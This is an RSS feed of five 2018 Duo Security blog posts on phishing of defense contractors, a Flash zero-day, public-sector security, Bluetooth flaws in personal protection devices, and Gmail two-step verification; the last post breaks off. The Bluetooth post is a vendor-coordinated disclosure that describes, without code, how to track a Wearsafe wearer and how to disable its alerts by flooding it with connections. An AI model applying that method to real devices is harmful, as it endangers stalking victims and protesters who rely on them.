<![CDATA[The Duo Blog]]> https://duo.com/ Duo's Trusted Access platform verifies the identity of your users with two-factor authentication and security health of their devices before they connect to the apps you want them to access. Tue, 13 Feb 2018 12:04:00 -0500 en-us info@duosecurity.com (Amy Vazquez) Copyright 2018 3600 <![CDATA[Cloud and Aerospace Defense Contractors Targeted by Phishing Emails]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/cloud-and-aerospace-defense-contractors-targeted-by-phishing-emails https://duo.com/blog/cloud-and-aerospace-defense-contractors-targeted-by-phishing-emails Industry News Tue, 13 Feb 2018 12:04:00 -0500

Last week, the Associated Press (AP) reported that the Fancy Bear hacking group targeted at least 87 employees working for U.S. defense contractors via personal Gmail accounts and some corporate email accounts. Fancy Bear is said to be associated with a Russian military intelligence agency, according to several information security firms.

According to the report, both small and large defense companies were targeted, including key contractors working on advanced technology for militarized drones, missiles, rockets, stealth fighter jets and cloud computing platforms. AP reported that 15 people that worked on drones were targeted.

If compromised, proprietary company data, such as advancements in drone and weapons research, and the U.S.'s defense could be at risk. The AP's analysis of classified emails collected by SecureWorks found that 40 percent of the victims clicked on phishing links (sample size of 19,000 lines of "email phishing data" from March 2015 to May 2016).

One CEO of an intelligence and aerial systems firm clicked on an email disguised as a Google security alert in his inbox - but stopped short of entering his credentials, as he realized it was a phishing scam. Another specific target included a drone sensor specialist, an electronics engineer for batteries and drones, and a senior engineer at one of the largest aerospace companies in the U.S.

In addition to targeting aerospace and drone companies, the hacking group also went after the Gmail accounts of a compliance officer and operations manager of cloud computing services. They also targeted another federal service provider that helps the FBI and other intelligence agencies with high-speed storage networks, data analysis and cloud computing.

While it can be difficult to secure or manage the personal email accounts of employees, there are a few simple best information security practices that can help mitigate the potential effects of a phishing attempt:

  • Ensuring User Trust - Nowadays, stolen passwords and spoofed network addresses mean attackers can impersonate legitimate users and fly under the radar within company networks. Strengthening authentication by adding in multiple factors (multi-factor authentication or two-factor authentication) helps secure access to accounts.
  • Ensuring Device Trust - Checking the security health of every endpoint that logs in to company applications can protect against threats or malware that exploit vulnerabilities in out-of-date software.
  • Strong Access Policies - To protect access to critical applications and data, set up device certificates that help you identify corporate-owned vs. personal devices and create strong access policies to block or warn users about devices that don’t meet your company’s security standards.

Data Security Standards for Contractors

The Dept. of Defense (DoD) has extended its Jan. 1 deadline to require contractors to have a plan in place to comply with NIST's (National Institute of Standards and Technology) Special Publication 800-171, the standards by which contractors should follow when handling controlled unclassified information.

There is a rule to require civilian contractors to comply with the NIST guidelines, and the public comment period is open from April to June 2018. The General Services Administration (GSA) is also tightening requirements for reporting of cybersecurity breaches, among other proposals as listed in a Federal Register Notice from January.

One reason to standardize data handling systems is to make data sharing more secure and convenient (eliminating the need for risk assessments and sharing agreements) as information travels from one agency to another, as Federal News Radio reports. Another reason is to standardize the protection of information as it moves from the federal space to the non-federal.

For small manufacturers, the DoD provides a high-level, plain language guide to their cybersecurity requirements, outlining why and what they must do, including reporting breaches within 72 hours. Read What Small Manufacturers Need to Know FAQ (PDF) for more information.

To help protect against threats posed by phishing attempts similar to the ones launched by Fancy Bear, the NIST SP 800-171 basic security requirements include the section 3.5 on Identification and Authentication:

  • 3.5.1 - Identify system users, processes acting on behalf of users, and devices.
  • 3.5.2 - Authenticate (or verify) the identities of those users, processes, or devices, as a prerequisite to allowing access to organizational systems.

As well as a number of derived security requirements, including:

  • 3.5.3 - Use multi-factor authentication for local and network access to privileged accounts and for network access to non-privileged accounts.

Check out the complete list of NIST 800-171 (PDF) requirements to learn about the fourteen security requirement families, including access control, awareness and training, incident response and more.

]]>
<![CDATA[No Patch Yet: Flash Vulnerability Exploited in the Wild]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/no-patch-yet-flash-vulnerability-exploited-in-the-wild https://duo.com/blog/no-patch-yet-flash-vulnerability-exploited-in-the-wild Industry News Fri, 02 Feb 2018 00:00:00 -0500

There are many, many Adobe Flash Player vulnerabilities (at least 1,045 reported ones listed in CVE Details), but one recent bug has been reportedly actively exploited by attackers - and there's no fix yet.

Adobe will release an update in a few days ("planned for the week of February 5"), but the best advice now is to disable or uninstall Flash. Another fix for administrators may be to enable click-to-play for Flash in users' browsers. Last year, Google disabled Flash by default in the Chrome browser. Mozilla also blocked it in Firefox in 2015, while Microsoft has enabled click-to-play for Flash in the Edge browser.

However, for users browsing on out-of-date or old browsers (like Internet Explorer) with out-of-date plugins like Flash, they are especially vulnerable to bugs they haven’t yet patched for in their systems. An Adobe security advisory warns that the critical vulnerability (CVE-2018-4878) affects Flash version 28.0.0.137 and earlier. An attacker could take control of an affected system.

CVE-2018-4878 Exploited in the Wild

As reported by Threatpost, the South Korean Computer Emergency Response Team issued a warning on Wednesday about attacks targeting South Koreans. The vulnerability is a Flash SWF file embedded in Microsoft Word documents - if a user opens a malicious document, web page, or spam mail containing the Flash file, an attacker could compromise their system.

In October, Adobe released an out-of-band (meaning, outside of their usual Patch Tuesday schedule) patch in response to another critical vulnerability that was being exploited in the wild, used in targeted attacks against Windows users. CVE-2017-11292 allowed for remote code execution.

Prevalence of Out-of-Date Flash Plugins

In Duo's 2017 Trusted Access Report: The Current State of Endpoint Security, the percentage of enterprise endpoints running an out-of-date version of Flash has increased from 42% in 2016 to 53% in 2017. Flash is the most out of date on IE (58%), while most up to date on the Chrome browser (65%).

Duo 2017 Trusted Access Report: Flash Trends

The report looks at all endpoints used to log into and access enterprise applications and resources, including both corporate-owned and personal devices.

Personal devices can be cause for more concern as remote and mobile workers continue to blur the lines between work and personal computing, often using personal smartphones, laptops, tablets, PCs and more to access work resources (typically web-based applications, where data is stored virtually in the cloud).

Protecting Against A Compromise via Flash

Some point to ad blocking in browsers in order to curb the threat of exploitation via Flash malvertisements, as seen on Decent Security - Adblocking for Internet Explorer Without an Extension: Enterprise Deployment.

Blocking advertising has multiple security and performance benefits to clients. Ads are especially dangerous to corporate computers, which often run outdated plugins that can be exploited by malvertising.

Adobe has also recommended:

Beginning with Flash Player 27, administrators have the ability to change Flash Player’s behavior when running on Internet Explorer on Windows 7 and below by prompting the user before playing SWF content. For more details, see this administration guide.

And ultimately, Adobe will be sunsetting Flash in 2020:

...in collaboration with several of our technology partners – including Apple, Facebook, Google, Microsoft and Mozilla – Adobe is planning to end-of-life Flash. Specifically, we will stop updating and distributing the Flash Player at the end of 2020 and encourage content creators to migrate any existing Flash content to these new open formats.

However, for remote users or those using personal devices to access work applications, they may not be subject to group policies put in place by administrators. By using an endpoint and authentication solution that can give you insight into corporate vs. personal devices, you can create more granular access policies to ensure only 'trusted' (or secure) devices can access corporate apps.

For example, you might set a device access policy that blocks all personal devices running an out-of-date version of Flash, warning users to update their plugins in order to gain access.

This new approach to enterprise security can help provide more contextual security against threats that lie beyond the perimeter of traditional defenses, and ensure the trust of both the user and their device.

]]>
<![CDATA[Everything is Changing: A Modern Security Model for the Public Sector]]> srazier@duo.com(Sean Frazier) https://duo.com/blog/everything-is-changing-a-modern-security-model-for-the-public-sector https://duo.com/blog/everything-is-changing-a-modern-security-model-for-the-public-sector Industry News Tue, 30 Jan 2018 08:30:00 -0500

I thought it might be worthwhile to provide some insight as to why I recently joined Duo as the Advisory CISO for the Public Sector. Duo will have a very significant influence on the next wave of cybersecurity in the public sector. Furthermore, Duo has the potential to help the government do what it has desperately been trying to do - move to the cloud and mobile, quickly. That’s personally and professionally exciting for me.

For me, the writing is on the wall. First, I believe a few things to be true:

  1. Public Sector will ultimately move away from the data center business. Everything will be “cloud.” Cost, simplicity and missions will require this change - sooner rather than later.
  2. Mobile will consume the desktop whole - iOS, Android, Windows 10… all popular mobile OSes.
  3. Items 1 and 2 will eliminate any need for a traditional ‘perimeter.’

Duo is helping to usher in a new security paradigm through modern multi-factor authentication (MFA). The security model we all grew up on (VPNs, firewalls, etc.) struggles to keep up with this “cloud-first,” “always-connected” world we find ourselves in.

Some funny things happened along this road.

First, to quote Justin Timberlake, Apple brought the PKI (public key infrastructure) sexy back. When Apple built the iOS security model, it relied heavily on PKI for hard security functions, like application and code signing, as well as its trusted boot architecture. It put a whole lot of security power underneath a pretty touch UI. Thankfully, the end user has never really been exposed to the complexities of PKI. Apple made it easy. However, anyone who has worked in the federal market before has had exposure to PKI and its complexities.

To me, SSL has always been the most successful example of a PKI use case. SSL was easy to deploy (for the most part) and didn’t require the end user to jump through hoops in order to use it. Apple’s implementation is not only another elegant example of PKI in use, but it’s at scale, at a massive scale.

Second, mobile begets cloud and cloud begets mobile. This self-propagating “ecosystem” has brought power to app developers in the commercial world - agility, speed to market, whatever. This trend started in the consumer world and has brought this exact same power to the enterprise over the past many years. Public sector agencies are just now starting to realize some of these “powers” and need help to keep up.

So…..

I see Duo doing the exact same thing for enterprise security. Our very ethos is that security should be equivalent to a “dial-tone.” It needs to be easy and available. It needs to be easy for users to access and easy for enterprises to deploy.

Most importantly, security should not get in the way.

In future blogs, I’ll discuss specifically how Duo can assist the government in protecting its move to cloud. I will further discuss the concept of ‘perimeter-less’ networks and smart, mobile endpoints and how the two concepts provide agencies (and the government) the ability to do something it has been seeking to do - move faster to support missions, leverage COTS (Commercial Off The Shelf) technologies and solve hard security problems.

I’m excited to be at Duo and to help public sector agencies as they contemplate a move to a modern security model.

]]>
<![CDATA[Bluetooth and Personal Protection Device Security Analysis]]> mloveless@duosecurity.com(Mark Loveless) https://duo.com/blog/bluetooth-and-personal-protection-device-security-analysis https://duo.com/blog/bluetooth-and-personal-protection-device-security-analysis Duo Labs Wed, 24 Jan 2018 08:30:00 -0500

The TL;DR

Looking at the ROAR, Wearsafe and Revolar personal protection devices - commonly used by women for personal safety but increasingly by other segments of the population including protesters, human rights workers, and the like - we discovered a few flaws or “gotchas” involving Bluetooth for the Wearsafe and Revolar (ROAR looked good):

While it wasn’t nearly as easy to remotely track a Revolar owner, it is still possible to track the owner of either the Revolar or Wearsafe device from a distance via Bluetooth with inexpensive antennas that extend the scanning range.

Both devices allow for Bluetooth scanning to identify the device as a personal protection device. Both devices allow for somewhat insecure Bluetooth pairing.

The Wearsafe product is subject to a denial of service attack that prevents the device from performing its main functions.

Background

Personal protection devices are small physical devices that allow users to discreetly press a button to signal to friends that they’re in a potentially dicey situation, particularly if the act of pulling out and using their phone would cause a situation to escalate to something more serious.

The small devices use Bluetooth to talk to the phone, and by using a companion app on that phone that gathers GPS data, a list of friends can be sent a warning message about where the user is. There are usually multiple alerts with different meanings:

  • This could involve a check-in (“I have arrived at a place and all is ok”)
  • A potential danger (“The place I am at looks fairly sketchy”)
  • Or immediate danger (“There is a bad person/situation confronting me, I am in immediate need of physical assistance”).

The alerts are triggered by pressing a button on the physical device, with one click meaning one thing and multiple clicks meaning something else.

The common scenarios are as follows:

  • The user is a woman, and she has been stalked by someone. While she is out, she either sees or is confronted by the stalker. She’s afraid that if she gets out her phone it might cause her stalker to rush and grab her phone before she can call a friend or 911. By discreetly pushing a button on her personal protection device, she can send a warning with her location without triggering a physical confrontation that could occur if she got out her phone.
  • A protester under a repressive regime is out marching. Suddenly, the protesters are surrounded by armed government thugs. If the protesters get out their phones, they might be arrested if it looks like they are filming the event or calling their friends. A discreet button press on a personal protection device can send a message to their friend with their location and that they are in danger. The friends could contact international press in the area to go investigate, based upon the GPS coordinates in the message.

As you can see, the need for the security for these devices is slightly different than many other Internet of Things (IoT) devices. There are both stalker victims and human rights workers who are afraid to wear Fitbits because they might be tracked, so purchasing one of these devices should allow the wearer to not just feel more secure, but actually be more secure. Between that and the increased use amongst human rights workers in foreign lands and protesters under duress from repressive authorities, security is of the utmost importance.

The devices are similar in that they require one to register themselves with the app to the vendor website, enroll recipients to get notifications from the user in the event that alerts are sent, and, of course, pair the device with the button to the phone via Bluetooth. There are multiple warnings that alert a recipient of a user’s situation, falling between a simple check-in to an all-out notification of immediate danger. All involve using the phone’s GPS coordinates.

Methodology Used

When one approaches IoT, the most obvious thing is to go after the device itself and see if it can be compromised. In some cases, such as devices that are essentially small computers running a complete operating system, this makes sense. However, these devices usually operate autonomously and do not require frequent (or sometimes constant) communication with an app on a phone or getting data to the cloud.

Other times, an IoT device is intended to either communicate directly with the app on the phone, or it needs to move data from itself to the cloud and will use the phone as its router. In those cases, the point of attack changes; as by compromising a point on the communications path between app and cloud or by compromising just the phone, you stand the chance for more “impact,” particularly when dealing with a group of users that have adopted a technology - you could potentially compromise the entire group.

In this examination, we are looking at the Bluetooth side of things. From a Bluetooth perspective, personal protection devices pose two potential areas of threat - they could be tracked at the individual level, and they could be rendered inoperative via a remote attacker. We look at both approaches.

What To Check

Here is the current checklist Duo Labs usually goes through:

  • Overall security stance of the device from a Bluetooth perspective.
  • Secure Bluetooth pairing.
  • Non-obvious names and values accessible via Bluetooth probing and scanning.
  • Bluetooth stack on device not vulnerable to a denial-of-service attack.
  • Design real-world attack scenarios, then try to connect the dots to see if they can be implemented using a combination of flaws found and existing limitations (or lack thereof) in the technology involved.

General Observations

There is an immediate issue with using Bluetooth as the method for communication between device and phone - for the device to function, it requires the phone to have Bluetooth enabled. Keep in mind that some of the women that have purchased this product were afraid that they could be tracked via their FitBit (learned this from a friend who has worked with abused and harassed women). Turning on Bluetooth on your phone can have some unintended consequences.

The Apple iPhone, when Bluetooth is enabled, seems to remain in discoverable mode even after leaving the Bluetooth setup screen. According to multiple sources, including some on Apple’s website, it leaves discoverable mode when you leave the Bluetooth screen; however, every Bluetooth scanner says otherwise.

This means that if you use an iPhone to pair your personal protection device, you’ve just opened up the iPhone itself to tracking. A typical stalker would certainly be able to track via the phone itself, whereas the personal protection devices on occasion will go into discoverable mode as a part of their normal operation.

A dedicated stalker would eventually see the personal protection device, put two and two together, and adjust tactics accordingly. Currently, the only way to disable discoverable mode on an iPhone is to disable Bluetooth altogether, which kind of defeats the purpose since you cannot use your personal protection device without Bluetooth.

The Android could potentially do the same thing. However, by going into system settings (exact location may vary depending on the version of your OS), discoverable mode can be turned off, and a timer can be set to turn discoverable mode off if you’ve turned it on to pair to a device. The latest versions of the operating system already have discoverable mode turned off anyway, so the level of this particular risk is reduced.

Wearsafe

At first glance, the Wearsafe product works as designed. There is a cumbersome element that involves getting the recipients of your warnings to install the app, and you have to subscribe to the service (a few dollars per month) before you can even start registering recipients. That said, once configured it works as designed.

The Wearsafe Device Figure 1. The Wearsafe device.

Bluetooth

The Bluetooth pairing process between phone and the Wearsafe device leaves something to be desired - as you pair, the phone says to enter the numeric code that appears on the device, which, of course, there is none.

However, the instructions state that the name of the Bluetooth device - in my case Tag-2292 - contains the numeric value for pairing. This means that instead of the hopelessly insecure “Just Works” method which essentially uses a hard-coded passkey of all zeroes, they are using the legacy 2.0 Bluetooth standard of a hard-coded 4-digit passkey, and they include the passkey in the Bluetooth device name.

Entering in 2292 allowed the pairing. While I could change the name of the device in the app, this was not pushed down or reflected in the device itself, which still advertised itself as Tag-2292. If they were going to do this, they could have simply gone with Just Works.

It should be noted that the serial number, verified by attaching to and querying the serial number GATT UUID (which starts with 0x00002a25), contains 2292 as the last four digits. Additionally, there was also a sticker on the underside of the lid of the Wearsafe device that had 2292 (see Figure 1).

Wearsafe Battery Figure 2. Underside of the Wearsafe battery cover.

As soon as you plug the battery into the device, it begins advertising via Bluetooth. It seems to advertise nearly continuously, although there would be stretches where (according to the scanner) it would stop for maybe an hour or so, but would resume and continue in discoverable mode for hours on end. For the most part, it was on and letting the world know about its existence.

With the manufacturer set to “Wearsafe Labs, Inc.” and the device name of Tag-xxxx where xxxx is a four-digit number, it was more than easy to identify the device. With a free scanner app on a phone, the Wearsafe device was easily detected as long as you were within close range, and using a laptop along with a larger antenna, one could easily detect the device from longer distances (up to a quarter mile away with a $50 antenna, further with more powerful antenna). Coupled with the non-changing MAC address always starts with 40:54:E4, which is registered to Wearsafe Labs, Inc., it is easy to track the device from a slight distance, which kind of defeats the idea of having a stealth device.

Denial of Service

Regular types of denial of service did not impact the device, or at least initially seem to. The chip supports up to eight connections - so flooding the device with BLE connections did nothing if the connection with the paired phone was unbroken. However, once that phone connection came undone, the remaining connection was taken up and the device would not allow for connectivity from the phone to be re-established.

Since the BLE connection attempts were never completed and disconnected properly, the device was locked up from use, including the ability to send alerts. The only way to recover the device (letting it sit for up for 4 hours did not work) required a hard reset by removing and reinserting the battery.

It should be noted that repeated attacks did cause the battery to drain slightly quicker, but not enough to consider it a viable attack. For example, if the battery life were to last 21 days, at most the attacks probably knocked 2-3 days off of the life of the battery. Repeated attacks would drain the battery more substantially, but with the denial of service this seemed to be an unnecessary attack.

Revolar

The app is easy to set up, and it is less work to get things configured to work than the Wearsafe. Additionally, it does not require the friends you are notifying to download the app, as it relies on both email and SMS for notifications. In general, while the device is more expensive than the Wearsafe, the entire process was less painless.

Revolar Device Figure 3. The Revolar device.

Bluetooth

Bluetooth pairing is also an issue with Revolar. It will try to pair using Just Works, but it states in the documentation if you are prompted for a passkey to use “1234” (falling back to legacy 2.0 standards). Not exactly secure, but Revolar does make up for it in another way.

Once the battery is inserted, the Revolar device does not immediately start broadcasting its existence via discovery mode. Instead, to pair with the device, you have to hold down the button for 12-15 seconds to enter discovery mode, and then it can be paired with the phone.

After it has been paired, it goes into discovery mode to talk to the phone for roughly 30 seconds every 60 minutes. Otherwise, it is not discoverable via traditional scans, and direct probes to the MAC address of the device were unanswered. While still not perfect, this is a much more secure method of a device living in a Bluetooth world.

The manufacturer was listed as “Texas Instruments” and the name was listed as “Revolar,” which means the device is still trackable via Bluetooth scanning, although going into discovery mode once an hour creates a much smaller window.

Revolar Battery Figure 4. Under the battery of the Revolar device.

Denial of Service

Attempts to cause the device to fail via denial of service did not work. Multiple attempts were made using a variety of techniques.

ROAR Personal Safety and Athena

The ROAR device, known as Athena, works with the ROAR Personal Safety app on your phone. Like the other two devices, you can trigger a couple of different alerts, however, Athena also has an alarm mode that clocks in at an impressive 90db with an attention-getting audio alert. This is a nice addition, as the user might be in a place where attention could be a helpful choice to consider in the event of a confrontation. So extra points for team ROAR for this.

Athena Device Figure 5. The dark gray Athena device, for use with the ROAR Personal Safety app.

Bluetooth

The pairing method is Just Works. Again, not really ideal, but at least there is no fallback to legacy 2.0 pairing. Like the Revolar, you have to trigger the device to start a pairing process, so this substantially reduces risk. That said, the security model implemented is rather impressive.

Athena has implemented the highest security settings, including LE Privacy, and this is in place before the device is even paired to the phone. Roughly every twenty minutes, a new MAC address is assigned. After pairing, if the Athena is triggered via a button press, the MAC address is cycled again. Even at the low level of Bluetooth, both privacy and security have been considered - most Bluetooth devices do not implement LE Privacy mode at all, so this is great to see.

The usual probing of the device turned out to be impossible. By using Secure Connection Only Mode, any connection to Athena requires authentication, and once paired, you cannot pair a second device. So the usual tricks of scanning the device with traditional Bluetooth hacking tools failed. Athena refused to give up any information at all.

Denial of Service

Like the Revolar, attempts to cause the Athena device to fail via denial of service did not work. Multiple attempts were made using a variety of techniques.

Comparison

Here is a breakdown of issues looked at, and issues found.

Possible Issue Wearsafe Revolar ROAR (Athena)
Pairing method Bluetooth 2.0 legacy 4 digit pin Bluetooth 4.0 “Just Works” with fallback to 2.0 legacy 4 digit pin Bluetooth 4.0 “Just Works”
Allows for multiple devices to pair No No No
Bluetooth probing reveals too much info Yes Limited window, but yes No
Trackable via scanning Yes Limited No
Vulnerable to denial of service Yes (flood of connections) No No
Uses additional security methods No Discovery mode enabled once per hour Secure Connection Only Mode including LE Privacy

Vulnerability Summary

Wearsafe Vulnerable to Bluetooth Tracking.
Using a Bluetooth scanner, including free scanners available for phones, it is possible to physically track the wearer of a Wearsafe device. The device is easily identified via the manufacturer, “Wearsafe Labs Inc” and name “Tag-xxxx” where xxxx is a four digit number - the same number used in the pairing process.

CVE: None.

Recommendation to vendor: Only use discovery mode for pairing, and only periodically to check in via the phone app if needed. Implement Secure Connection Only Mode and LE Privacy from the Bluetooth specification - periodically rotate the MAC address used for advertising and after every battery change. Change the manufacturing name to something less obvious. Disable legacy 2.0 pairing support.

User remediation: Remove the battery in the Wearsafe device until right before entering a physical space where you might be threatened. While this is vague and in many cases defeating of the entire point of having the Wearsafe device to begin with, this is probably the best solution until a vendor fix is provided. If you are using iOS and have the Apple Watch, use the app for the Apple Watch from Wearsafe instead of the device (the Apple Watch uses LE Privacy), which will prevent tracking.

Wearsafe Vulnerable to Denial of Service.
Under a heavy load on connection requests, if the device becomes disconnected from the phone it is paired to, an attacker can fill the connection table, rendering the device unable to re-establish communication with the phone without a hard reset (temporarily remove the device’s battery). There is no indication in the app that this has occurred. Subsequently, activation of an alert via the device fails to go through the phone, with no indication of alert delivery failure.

CVE: CVE-2017-11431.

Recommendation to vendor: Periodically time out spurious connections, perhaps more quickly when all connections are in use. Implementation of Secure Connection Only Mode will eliminate this issue.

User remediation: None. If the device is unable to connect to its paired phone, remove and replace the battery.

Revolar Vulnerable to Bluetooth Tracking.
Using a Bluetooth scanner, including free scanners available for phones, it is possible to physically track the wearer of a Revolar device. The device is easily identified via the name “Revolar.” In spite of the fact that discovery mode is used only periodically (once per hour) this still allows for a window in which tracking can occur.

CVE: None.

Recommendation to vendor: Implement Secure Connection Only Mode and LE Privacy from the Bluetooth specification - periodically rotate the MAC address used for advertising and after every battery change. Disable legacy 2.0 pairing support.

User remediation: Remove the battery in the Revolar device until right before entering a physical space where you might be threatened. While this is vague and in many cases defeating of the entire point of having the Revolar device to begin with, this is probably the best solution until a vendor fix is provided.

ROAR Athena.
There were no issues outside of the pairing process, but even that is mitigated to the point of not being an issue.

Exploit Summary

Wearsafe

The main issue for the Wearsafe device involves the denial of service, and coupled with the ability to track the device, creates a rather nasty situation.

By scanning for Bluetooth devices, an attacker could recognize a Wearsafe device using inexpensive hacking tools, and could even detect a Wearsafe device from a distance with the proper antenna. Additionally, using the same hardware, it is possible to perform a denial of service by rapidly connecting to device repeatedly. Since Bluetooth, by nature, is not the most stable of communications, it will on occasion drop and then re-establish connections with paired devices.

A sustained connection attack against the Wearsafe device in a lab environment took advantage of this, and would result in the denial of service within 90 minutes on average. A dedicated attacker could locate the victim and launch the attack while the victim is stationary (at home in the evening, or while at their place of employment), even from a distance.

In the scenario of an attacker going after a victim, they can remotely disable the Wearsafe device and then simply use it as a tracking device to hone in on the victim. The attacker would be well aware that any attempt to use the device to notify others simply would not work, and perhaps be emboldened.

During our testing and reporting to Wearsafe, they asked for a video showing the denial of service attack in action. While originally made just for them, we thought we’d link to an edited version of it here for those that are interested.

Revolar

The main issue for the Revolar is tracking of the device. While the window of tracking is slight, it is there and alerts an attacker that the potential victim is capable of remotely and quickly notifying others of their location. The main concern is that the attacker can adjust tactics (disguise, approach from behind, quickly restrain hands, etc.) to address the situation of the victim actually using the device.

All Products

As stated previously, it should be noted that all three products - Wearsafe, Revolar, and ROAR - require Bluetooth to be active on the phone the device is paired to. If your concern is that you can be physically tracked via Bluetooth by your personal protection device, whether that personal protection device can actually be tracked or not may not matter.

If your phone is an Android, many models allow you to turn off “discoverable” mode, and in recent models, discoverable mode is off by default. For the iPhone, turning on Bluetooth puts the phone in Bluetooth’s discoverable mode with no way to turn it off. A device in discoverable mode can be tracked.

Emergency SOS iPhone Figure 6. Using the iPhone as a “personal protection device”.

For you iPhone users, you could use your phone as a personal protection device of sorts - by invoking Emergency SOS. If your iPhone is in your pocket, you could potentially get your hand in there to use that SOS to get help. This also disables Touch ID, which has the somewhat morbid side effect of preventing an attacker - who just rendered you unconscious - from using your fingerprint to try to thwart actions the SOS triggered. It should also be noted that this negates the need for turning on Bluetooth which makes your iPhone trackable.

Vendor Responses

For each reported vulnerability listed in the Vulnerability Summary section above, this is the vendor response to each one.

Wearsafe

Oct. 18, 2017 - Contacted the vendor via email, 90 day clock started.
Oct. 25, 2017 - Wearsafe reported any vulnerability would be fixed in a future update.
Oct. 30, 2017 - Wearsafe requested a video demonstrating the vulnerability.
Nov. 01, 2017 - Video sent to Wearsafe, Wearsafe acknowledged and said they will work on the denial of service issue.
Nov. 09, 2017 - Wearsafe released an update to their app, version 1.10.2.
Jan. 05, 2018 - Have not received any further updates from Wearsafe, latest version appears to correct the Denial of Service issue. Assigned CVE ID.
Jan. 24, 2018 - Public release date.

Revolar

Oct. 18, 2017 - Contacted the vendor via email. No response.
Oct. 24, 2017 - We learned that Revolar filed for bankruptcy and shut down operations on September 25, 2017, and this was eventually made public on October 24, 2017. On the FAQ portion of their site was this answer: “Please refer to our knowledge center to find answers to frequently asked questions. We no longer have customer support personnel who can respond to support issues.”

The retailers that carried Revolar products - Target, Best Buy, Brookstone, and others - continued to sell the devices until they had depleted their stock. The service still worked as of this writing and they are trying to sell off their technology to another company, but there is no guarantee the service will continue for any extended length of time.

Did We Cover Your Product?

There are a number of personal protection devices on the market, and the market is constantly changing. We were specifically covering products that included “devices” as the model of discreet device activation over pulling out the phone was an interesting one. There are other products out there with devices, and there are dozens of app-only devices that require one to interact with the phone (or, in some cases, a paired smart watch). If you are curious about one of these other products and have an urge to explore them as well, we do have a few resources to point you to:

Look at our analysis of a smart power tool, as it covers pulling apart applications and sniffing encrypted traffic by bypassing certificate pinning Bug Hunting: Drilling Into the Internet of Things. Our Bluetooth hacking blog post covers tools and their use, and was written during the testing of the personal protection devices: Bluetooth Hacking Tools Comparison.

Our exploration of hardware was honed on the ROAR Athena device: Examining Personal Protection Devices: Hardware and Firmware Research Methodology in Action. Our Bluetooth security explanation covers the different modes of security and privacy settings: Understanding Bluetooth Security.

Summary

There are a couple of issues to keep in mind when purchasing IoT devices - particularly those with security implications like personal protection devices. First, the device may be subject to an attack, even a simple one like the denial of service against the Wearsafe Tag. If this were a smart toaster, no one would care and we probably wouldn’t even report it, but this particular type of vulnerability is the exact wrong thing for such a device to have.

Second, a number of small startups like the Revolar seem great, only to go out of business in spite of having a decent product that is shipping. While it is hard to determine what the future may hold for any IoT device, it is a harsh reminder that it is a tough market filled with lots of promise and shiny newness that often fails, sometimes unexpectedly.

Given the patching, we’re willing to recommend either the Wearsafe Tag or the ROAR Athena. For the Wearsafe product, if you have the Apple Watch, you might consider using that in place of the tag as the Apple Watch Wearsafe app is riding on a much more secure platform, placing it much closer to the ROAR model in terms of security.

For me, the ease of the ROAR coupled with a lack of a monthly subscription service and advanced security, give it a distinct advantage. After using both and looking at the implemented security, I’d personally recommend the ROAR product due to the amount of care and thought in the security model.

Hopefully this evaluation helped inform you if you were planning on purchasing one of these devices, and we hope the evaluation process gave you some insight into how one approaches testing the security of such devices.

]]>
<![CDATA[Two-Step Verification or Two Factor: 90% Don't Use it to Protect Gmail]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/two-step-verification-or-two-factor-90-dont-use-it-to-protect-gmail https://duo.com/blog/two-step-verification-or-two-factor-90-dont-use-it-to-protect-gmail Industry News Tue, 23 Jan 2018 00:00:00 -0500

Less than 10 percent of active Google accounts use two-step verification (2SV) to secure access to their services, like Gmail, according to a Google Software Engineer Grzegorz Milka’s presentation at the USENIX Enigma 2018 security conference as reported by The Register.

A Google and University of California research paper published last November, Data Breaches, Phishing or Malware? Understanding the Risks of Stolen Credentials found that only 3.1 percent of users enabled two-factor authentication after successfully recovering their hijacked Gmail account. The discrepancy between security-aware and regular users is noted:

While experts commonly favor using two-factor authentication or password managers, these tools are virtually absent from the security posture of regular users.

Google’s longitudinal measurement study analyzed millions of keylogger and phishing kit victims from March 2016 - March 2017, including 1.9 billion usernames and passwords exposed as the result of data breaches.

Phishing by Month Source: Google

What is Two-Step Verification?

Two-step verification (2SV) is a term used interchangeably by tech giants such as Google and Apple for two-factor authentication (2FA), the technology that adds another layer of security to logins. Primary authentication typically consists of a username and password, while secondary authentication can be carried out through a variety of different methods.

Apple has updated their support documentation to state:

Two-step verification is an older security method that is available to users who don’t have Apple devices, can’t update their devices, or are otherwise ineligible for two-factor authentication.

By this definition, they equate SMS-based 2FA with the term ‘two-step verification.’ They also provide newer documentation on using two-factor authentication to protect your Apple ID.

The Most Secure Two-Factor Authentication Methods

One method requires downloading a free authenticator app for your smartphone that generates unique, time-based passcodes you can type or copy and paste into your Gmail login page. This allows you to verify your identity with not only your password, but also with a secondary, physical device.

For enterprise-level or more advanced users interested in the most secure option available, using a physical USB device plugged into your computer to verify your identity provides protection against phishing attempts. By tapping it once, you can complete 2FA and log into your Gmail securely.

Yubikey USB Device

Source: Yubikey

Either of these methods take just seconds to complete login, are free or require a nominal amount of money and setup time (less than $20 for individual users and cheaper in bulk for enterprise users), and the small extra step is well worth it to keep your account (and data and access to other accounts) safe from theft.

So Many Ways to Phish

The main objective of a phishing email attempt is to steal information, through some means. One way is to send a user a phishing email with a link to a fake login page that spoofs a legitimate website with a message that urges the user to log in. The credentials are then forwarded to the phisher.

Another way to steal credentials and other data is to send an email with exploit kit or malware attachments that, when opened, check the user’s computer for certain versions of software. Then, if conditions are present, the malware will download and execute. The malware may include a keylogger or other type of malicious software that tracks every keystroke of the user, sending this data to the phisher.

Phishing Kits

A phishing kit is a bundle of site resources that can make campaigns more efficient and reusable, enabling non-technical phishers the ability to create spoofed websites and launch a phishing attack. For more information about phishing kits, read Phish in a Barrel: Hunting and Analyzing Phishing Kits at Scale.

Google’s report analyzed a sample of 10,037 phishing kits and about 3.8 million credentials that belonged to victims of the kits. They found that the most popular phishing kit was used by almost 3,000 attackers to steal 1.4 million credentials - this kit included a website that emulated Gmail, Yahoo and Hotmail logins. By far, Gmail was the most popular email provider used by phishers as exfiltration points to receive stolen credentials (72.3%).

The top phishing kits impersonate many other brands, including file storage services (Dropbox, Office 365), webmail providers (Workspace Webmail, AOL) and business services (Docusign, ZoomInfo).

Phishing kits collect not only credentials, but also additional information such as geolocation data, secret questions and device-related details.

This type of info can be used to bypass login challenges for services that attempt to detect suspicious login attempts.

The Consequences of Getting Access to Your Gmail

